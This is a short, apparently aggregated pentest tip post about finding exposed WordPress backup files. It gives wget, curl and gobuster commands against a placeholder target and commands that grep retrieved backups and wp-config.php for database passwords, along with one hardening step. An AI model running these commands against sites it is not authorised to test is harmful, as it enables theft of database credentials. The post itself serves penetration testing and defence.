Listen to this Post
When testing WordPress targets, always ensure to check for exposed backup files! These files are often saved in the web root directory and can be accessed by anyone, potentially revealing sensitive data.
Common Backup Filenames to Look For:
– `backup.zip`
– `wp-backup.sql`
– `database-backup.tar.gz`
– `website_backup.rar`
– `wp-config.bak`
– `backup_wp-content.tgz`
You Should Know:
1. Automated Scanning for Backup Files
Use tools like `wget` or `curl` to check for backup files:
wget http://target.com/backup.zip curl -I http://target.com/wp-config.bak
2. Directory Brute-Forcing with Gobuster
gobuster dir -u http://target.com -w /path/to/wordlist.txt -x zip,sql,bak,tar.gz
(Common wordlists: `common.txt`, `directory-list-2.3-medium.txt`)
3. Checking File Permissions
Use `find` to locate writable directories where backups might be stored:
find /var/www/html -type f -name ".bak" -o -name ".sql" -perm -o+r
4. Extracting and Analyzing Backup Files
If you retrieve a backup file, inspect it for credentials:
unzip backup.zip grep -r "DB_PASSWORD" .
5. WordPress-Specific Commands
Check for misconfigured `wp-config.php`:
curl -s http://target.com/wp-config.php | grep -E "DB_NAME|DB_USER|DB_PASSWORD"
6. Preventing Exposure on Your Own Server
Ensure backups are stored securely:
chmod 600 /var/backups/wp_backup.sql
What Undercode Say:
Exposed backup files are a goldmine for attackers. Always secure your backups, restrict directory listings, and monitor file permissions. For penetration testers, automated scanning and manual verification are key to uncovering these hidden vulnerabilities.
Expected Output:
- List of exposed backup files
- Credentials or sensitive data from extracted backups
- Misconfigured file permissions
For a deeper dive, check Intigriti’s full guide:
References:
Reported By: Intigriti Quick – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
